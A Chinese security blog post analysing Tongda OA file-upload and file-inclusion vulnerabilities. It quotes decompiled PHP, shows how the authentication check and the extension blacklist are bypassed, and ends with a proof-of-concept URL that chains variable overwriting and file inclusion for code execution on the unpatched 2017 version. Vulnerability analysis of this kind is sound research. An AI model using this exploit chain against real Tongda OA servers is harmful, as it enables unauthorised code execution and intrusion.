<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>通达OA任意文件上传+任意文件包含分析 | Sp4ce's Blog</title><meta name="description" content="通达OA官方于2020-03-13发布了安全更新，修复了任意文件上传（2013、2013adv、2015、2016、2017、V11）和文件包含（V11）漏洞，从官网下到源码解密后，简单看了下   直接看主流的2017、V11产品吧，这个系列产品有全版本的变量覆盖问题 V11、2017任意上传以2017为例 补丁文件路径：2020_A1\2017版\ispirit\im\upload.php 左侧"><meta name="keywords" content="日常,CodeReview"><meta name="author" content="Sp4ce"><meta name="copyright" content="Sp4ce"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://0x20h.com/p/7f23.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//pingjs.qq.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta property="og:type" content="article"><meta property="og:title" content="通达OA任意文件上传+任意文件包含分析"><meta property="og:url" content="https://0x20h.com/p/7f23.html"><meta property="og:site_name" content="Sp4ce's Blog"><meta property="og:description" content="通达OA官方于2020-03-13发布了安全更新，修复了任意文件上传（2013、2013adv、2015、2016、2017、V11）和文件包含（V11）漏洞，从官网下到源码解密后，简单看了下   直接看主流的2017、V11产品吧，这个系列产品有全版本的变量覆盖问题 V11、2017任意上传以2017为例 补丁文件路径：2020_A1\2017版\ispirit\im\upload.php 左侧"><meta property="og:image" content="https://0x20h.com/img/random/material-15.png"><meta property="article:published_time" content="2020-03-20T15:23:32.000Z"><meta property="article:modified_time" content="2020-03-21T03:50:12.672Z"><meta name="twitter:card" content="summary"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css"><script>var _mtac = {};
(function() {
    var mta = document.createElement("script");
    mta.src = "//pingjs.qq.com/h5/stats.js?v2.0.4";
    mta.setAttribute("name", "MTAH5");
    mta.setAttribute("sid", "66540600");
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(mta, s);
})();
</script><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '4.2.0',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime: '天',
  date_suffix: {"one_hour":"刚刚","hours":"小时前","day":"天前"},
  copyright: undefined,
  ClickShowText: {"text":"富强,民主,文明,和谐,自由,平等,公正,法治,爱国,敬业,诚信,友善","fontSize":"15px"},
  medium_zoom: false,
  fancybox: true,
  Snackbar: {"bookmark":{"message_prev":"按","message_next":"键将本页加入书签"},"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#2d3035","position":"bottom-center"},
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: true
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
    },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2020-03-21 11:50:12'
}</script><noscript><style type="text/css">
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = '1'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><meta name="generator" content="Hexo 4.2.0"></head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" data-lazy-src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">66</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">37</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">23</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-user"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/contact/"><i class="fa-fw fa fa-address-card"></i><span> 联系方式</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#V11、2017任意上传"><span class="toc-number">1.</span> <span class="toc-text">V11、2017任意上传</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#V11文件包含"><span class="toc-number">2.</span> <span class="toc-text">V11文件包含</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2017文件包含（官方无补丁，仅有文件上传补丁）"><span class="toc-number">3.</span> <span class="toc-text">2017文件包含（官方无补丁，仅有文件上传补丁）</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#拿下2017的另一个思路"><span class="toc-number">4.</span> <span class="toc-text">拿下2017的另一个思路</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(/img/random/material-15.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Sp4ce's Blog</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-user"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/contact/"><i class="fa-fw fa fa-address-card"></i><span> 联系方式</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">通达OA任意文件上传+任意文件包含分析</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2020-03-20T15:23:32.000Z" title="发表于 2020-03-20 23:23:32">2020-03-20</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2020-03-21T03:50:12.672Z" title="更新于 2020-03-21 11:50:12">2020-03-21</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/CodeReview/">CodeReview</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.5k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>7分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><p>通达OA官方于2020-03-13发布了安全更新，修复了任意文件上传（2013、2013adv、2015、2016、2017、V11）和文件包含（V11）漏洞，从官网下到源码解密后，简单看了下</p>
<a id="more"></a>

<p>直接看主流的2017、V11产品吧，这个系列产品有全版本的变量覆盖问题</p>
<h1 id="V11、2017任意上传"><a href="#V11、2017任意上传" class="headerlink" title="V11、2017任意上传"></a>V11、2017任意上传</h1><p>以2017为例</p>
<p>补丁文件路径：<code>2020_A1\2017版\ispirit\im\upload.php</code></p>
<p>左侧为原始代码，右侧为补丁，可以看到直接将鉴权的文件从<code>else</code>里释放了出来，避免了第5行传入<code>P</code>值导致的权限绕过问题</p>
<p><img src= "/img/loading.gif" data-lazy-src="/images/image-20200320233755927.png" alt="image-20200320233755927"></p>
<p>继续往下看任意文件上传的问题</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$TYPE = $_POST[<span class="string">"TYPE"</span>];<span class="comment">//获取TYPE</span></span><br><span class="line">$DEST_UID = $_POST[<span class="string">"DEST_UID"</span>];<span class="comment">//获取DEST_UID（接收方ID）</span></span><br><span class="line">$dataBack = <span class="keyword">array</span>();</span><br><span class="line"><span class="keyword">if</span> (($DEST_UID != <span class="string">""</span>) &amp;&amp; !td_verify_ids($ids)) &#123;</span><br><span class="line">	$dataBack = <span class="keyword">array</span>(<span class="string">"status"</span> =&gt; <span class="number">0</span>, <span class="string">"content"</span> =&gt; <span class="string">"-ERR "</span> . _(<span class="string">"接收方ID无效"</span>));</span><br><span class="line">	<span class="keyword">echo</span> json_encode(data2utf8($dataBack));</span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里进行了判断是否为空并调用了<code>td_verify_ids</code>函数进行校验</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="comment">//td_verify_ids</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">td_verify_ids</span><span class="params">($ids)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> !preg_match(<span class="string">"/[^0-9,]+/"</span>, $ids);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中<code>$ids</code>为<code>get</code>传入的<code>ids</code>值，PHP中没有进行赋值的变量的值为<code>NULL</code>，此时的<code>!preg_match(&quot;/[^0-9,]+/&quot;, $ids)</code>为<code>false</code>而<code>DEST_UID</code>我们可以通过<code>POST</code>操作，因此绕过了这个判断</p>
<p>继续往下看</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (strpos($DEST_UID, <span class="string">","</span>) !== <span class="keyword">false</span>) &#123;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">	$DEST_UID = intval($DEST_UID);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($DEST_UID == <span class="number">0</span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> ($UPLOAD_MODE != <span class="number">2</span>) &#123;</span><br><span class="line">		$dataBack = <span class="keyword">array</span>(<span class="string">"status"</span> =&gt; <span class="number">0</span>, <span class="string">"content"</span> =&gt; <span class="string">"-ERR "</span> . _(<span class="string">"接收方ID无效"</span>));</span><br><span class="line">		<span class="keyword">echo</span> json_encode(data2utf8($dataBack));</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果<code>DEST_UID</code>中存在有<code>,</code>，则通过<code>intval</code>获取整数值；最后当<code>$DEST_UID=0</code>时，<code>UPLOAD_MODE</code>要为2 否接收方ID无效。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">$MODULE = <span class="string">"im"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="number">1</span> &lt;= count($_FILES)) &#123;</span><br><span class="line">	<span class="keyword">if</span> ($UPLOAD_MODE == <span class="string">"1"</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span> (strlen(urldecode($_FILES[<span class="string">"ATTACHMENT"</span>][<span class="string">"name"</span>])) != strlen($_FILES[<span class="string">"ATTACHMENT"</span>][<span class="string">"name"</span>])) &#123;</span><br><span class="line">			$_FILES[<span class="string">"ATTACHMENT"</span>][<span class="string">"name"</span>] = urldecode($_FILES[<span class="string">"ATTACHMENT"</span>][<span class="string">"name"</span>]);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	$ATTACHMENTS = upload(<span class="string">"ATTACHMENT"</span>, $MODULE, <span class="keyword">false</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (!is_array($ATTACHMENTS)) &#123;</span><br><span class="line">		$dataBack = <span class="keyword">array</span>(<span class="string">"status"</span> =&gt; <span class="number">0</span>, <span class="string">"content"</span> =&gt; <span class="string">"-ERR "</span> . $ATTACHMENTS);</span><br><span class="line">		<span class="keyword">echo</span> json_encode(data2utf8($dataBack));</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p><code>$_FILES</code>全局变量大于等于1的时候(就是有文件上传的时候)，会调用<code>upload</code>方法进行处理，这里的文件上传的参数为<code>ATTACHMENT</code></p>
<p>跟进<code>upload</code>方法后发现了文件名合法性校验函数<code>is_uploadable</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">is_uploadable</span><span class="params">($FILE_NAME)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	$POS = strrpos($FILE_NAME, <span class="string">"."</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ($POS === <span class="keyword">false</span>) &#123;</span><br><span class="line">		$EXT_NAME = $FILE_NAME;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">if</span> (strtolower(substr($FILE_NAME, $POS + <span class="number">1</span>, <span class="number">3</span>)) == <span class="string">"php"</span>) &#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		$EXT_NAME = strtolower(substr($FILE_NAME, $POS + <span class="number">1</span>));</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>通过<code>strrpos</code> 函数获取<code>.</code>最后一次出现的位置开始到后面的3个字符串，不能为<code>php</code>，基于黑名单的绕过方式有很多，不再赘述。</p>
<h1 id="V11文件包含"><a href="#V11文件包含" class="headerlink" title="V11文件包含"></a>V11文件包含</h1><p>路径：<code>ispirit\interface\gateway.php</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">ob_start();</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/session.php"</span>;</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/conn.php"</span>;</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/utility_org.php"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($P != <span class="string">""</span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> (preg_match(<span class="string">"/[^a-z0-9;]+/i"</span>, $P)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> _(<span class="string">"非法参数"</span>);</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	session_id($P);</span><br><span class="line">	session_start();</span><br><span class="line">	session_write_close();</span><br><span class="line">	<span class="keyword">if</span> (($_SESSION[<span class="string">"LOGIN_USER_ID"</span>] == <span class="string">""</span>) || ($_SESSION[<span class="string">"LOGIN_UID"</span>] == <span class="string">""</span>)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> _(<span class="string">"RELOGIN"</span>);</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>只需要不传入P参数即可绕过，</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ($json) &#123;</span><br><span class="line">	$json = stripcslashes($json);</span><br><span class="line">	$json = (<span class="keyword">array</span>) json_decode($json);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">foreach</span> ($json <span class="keyword">as</span> $key =&gt; $val ) &#123;</span><br><span class="line">		<span class="keyword">if</span> ($key == <span class="string">"data"</span>) &#123;</span><br><span class="line">			$val = (<span class="keyword">array</span>) $val;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">foreach</span> ($val <span class="keyword">as</span> $keys =&gt; $value ) &#123;</span><br><span class="line">				$keys = $value;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> ($key == <span class="string">"url"</span>) &#123;</span><br><span class="line">			$url = $val;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ($url != <span class="string">""</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span> (substr($url, <span class="number">0</span>, <span class="number">1</span>) == <span class="string">"/"</span>) &#123;</span><br><span class="line">			$url = substr($url, <span class="number">1</span>);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> ((strpos($url, <span class="string">"general/"</span>) !== <span class="keyword">false</span>) || (strpos($url, <span class="string">"ispirit/"</span>) !== <span class="keyword">false</span>) || (strpos($url, <span class="string">"module/"</span>) !== <span class="keyword">false</span>)) &#123;</span><br><span class="line">			<span class="keyword">include_once</span> $url;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>传入<code>json</code>参数，其中包含<code>url</code>参数且<code>url</code>中包含<code>general\</code>、<code>ispirit\</code>、<code>module\</code>其一即可，<code>url</code>通过跨目录方式可以包含通过文件上传漏洞上传的包含恶意代码的文件造成命令执行。</p>
<h1 id="2017文件包含（官方无补丁，仅有文件上传补丁）"><a href="#2017文件包含（官方无补丁，仅有文件上传补丁）" class="headerlink" title="2017文件包含（官方无补丁，仅有文件上传补丁）"></a>2017文件包含（官方无补丁，仅有文件上传补丁）</h1><p>文件路径：<code>mac\gateway.php</code></p>
<p>原理同上，但是利用方式更为简单</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">ob_start();</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/session.php"</span>;</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/conn.php"</span>;</span><br><span class="line"><span class="keyword">include_once</span> <span class="string">"inc/utility_org.php"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($P != <span class="string">""</span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> (preg_match(<span class="string">"/[^a-z0-9;]+/i"</span>, $P)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> _(<span class="string">"非法参数"</span>);</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	session_id($P);</span><br><span class="line">	session_start();</span><br><span class="line">	session_write_close();</span><br><span class="line">	<span class="keyword">if</span> (($_SESSION[<span class="string">"LOGIN_USER_ID"</span>] == <span class="string">""</span>) || ($_SESSION[<span class="string">"LOGIN_UID"</span>] == <span class="string">""</span>)) &#123;</span><br><span class="line">		<span class="keyword">echo</span> _(<span class="string">"RELOGIN"</span>);</span><br><span class="line">		<span class="keyword">exit</span>();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($json) &#123;</span><br><span class="line">	$json = stripcslashes($json);</span><br><span class="line">	$json = (<span class="keyword">array</span>) json_decode($json);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">foreach</span> ($json <span class="keyword">as</span> $key =&gt; $val ) &#123;</span><br><span class="line">		<span class="keyword">if</span> ($key == <span class="string">"data"</span>) &#123;</span><br><span class="line">			$val = (<span class="keyword">array</span>) $val;</span><br><span class="line"></span><br><span class="line">			<span class="keyword">foreach</span> ($val <span class="keyword">as</span> $keys =&gt; $value ) &#123;</span><br><span class="line">				$keys = $value;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">if</span> ($key == <span class="string">"url"</span>) &#123;</span><br><span class="line">			$url = $val;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ($url != <span class="string">""</span>) &#123;</span><br><span class="line">		<span class="keyword">if</span> (substr($url, <span class="number">0</span>, <span class="number">1</span>) == <span class="string">"/"</span>) &#123;</span><br><span class="line">			$url = substr($url, <span class="number">1</span>);</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">include_once</span> $url;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">exit</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="拿下2017的另一个思路"><a href="#拿下2017的另一个思路" class="headerlink" title="拿下2017的另一个思路"></a>拿下2017的另一个思路</h1><p>官方发布了任意文件上传的补丁，并且部分WAF拦截了形如<code>../../</code>跨目录方式，无法包含<code>nginx</code>日志，是否意味着无法用包含玩了呢？</p>
<p>通过一番寻找，发现了一处利用官方文件<strong>合法</strong>写入并包含的点</p>
<p>涉及到的文件路径<code>general/workflow/document_list/input_form/form6.php</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;script type=\"text/javascript\" src=\"/inc/js/jquery/jquery.min.js.jz\"&gt;&lt;/script&gt;\r\n&lt;script&gt; \r\nfunction click_main_doc_op(op)\r\n&#123;\r\n\t   if(op == \"1\")\r\n\t   &#123;    \r\n\t\t $(\"tr_addfile\").style.display = '';    \r\n       &#125;else\r\n\t    &#123;\t \r\n\t\t $(\"tr_addfile\").style.display = 'none';    \r\n\t    &#125;\r\n&#125;\r\nfunction check()&#123;\r\n\talert();\r\n&#125;\r\n\r\n&lt;/script&gt;\r\n\r\n"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($MAINDOC_ID !== <span class="string">""</span>) &#123;</span><br><span class="line">	file_put_contents(<span class="string">"29.txt"</span>, $MAINDOC_ID);</span><br><span class="line">	ob_start();</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="keyword">include_once</span> <span class="string">"document_attach.php"</span>;</span><br><span class="line">	$data .= ob_get_contents();</span><br><span class="line">	ob_flush();</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"\r\n\r\n\r\n"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;table class=\"TableBlock\" width=\"95%\" align=\"center\"&gt;\r\n  &lt;tr&gt;\r\n  \t&lt;td class=\"TableHeader\" colspan=\"2\"&gt;创建正文文件&lt;/b&gt;\r\n  &lt;/tr&gt;\r\n  &lt;/tr&gt;\r\n  &lt;tr id=\"maindoc\"&gt;\r\n  \t&lt;td class=\"TableData\" width=\"120\"&gt;&lt;b&gt;创建方式：&lt;/b&gt;&lt;/td&gt;\r\n  \t&lt;td class=\"TableData\"&gt;\r\n  \t   &lt;input type=\"radio\" name=\"MAIN_DOC_OP\" id=\"MAIN_DOC_OP_1\" value=\"1\" onclick=\"click_main_doc_op(this.value)\"&gt;&lt;label for=\"MAIN_DOC_OP_1\"&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> _(<span class="string">"上传本地文件"</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/label&gt;\r\n  \t   &lt;input type=\"radio\" name=\"MAIN_DOC_OP\" id=\"MAIN_DOC_OP_2\" value=\"2\" onclick=\"click_main_doc_op(this.value)\"&gt;&lt;label for=\"MAIN_DOC_OP_2\"&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> _(<span class="string">"新建空文件"</span>);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/label&gt;\r\n        &lt;input type=\"button\"  id=\"MAIN_DOC_OP\" value=\"确定\" class=\"SmaillButton\" onclick=\"CheckForm(15);\" &gt;\r\n  \t&lt;/td&gt;\r\n  &lt;/tr&gt;\r\n  &lt;tr id=\"tr_addfile\" style=\"display:none;\"&gt;\r\n  \t&lt;td class=\"TableData\"&gt;&lt;b&gt;选择本地文件：&lt;/b&gt;&lt;/td&gt;\r\n  \t&lt;td class=\"TableData\" &gt;\r\n  \t   &lt;input type=\"file\" class=\"BigInput\" name=\"MAIN_DOC_FILE\" size=40&gt;\r\n  \t&lt;/td&gt;\r\n  &lt;/tr&gt;\r\n&lt;/table&gt;\r\n"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>由于这套程序存在变量覆盖，因此通过<code>gateway.php</code>包含该文件并传入<code>MAINDOC_ID</code>即可，POC：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#x2F;mac&#x2F;gateway.php?json&#x3D;&#123;&quot;url&quot;:&quot;..&#x2F;general&#x2F;workflow&#x2F;document_list&#x2F;input_form&#x2F;form6.php&quot;&#125;&amp;MAINDOC_ID&#x3D;PAYLOAD</span><br></pre></td></tr></table></figure>

<p>然后就会在<code>/mac</code>目录下生成<code>29.txt</code>，然后包含即可</p>
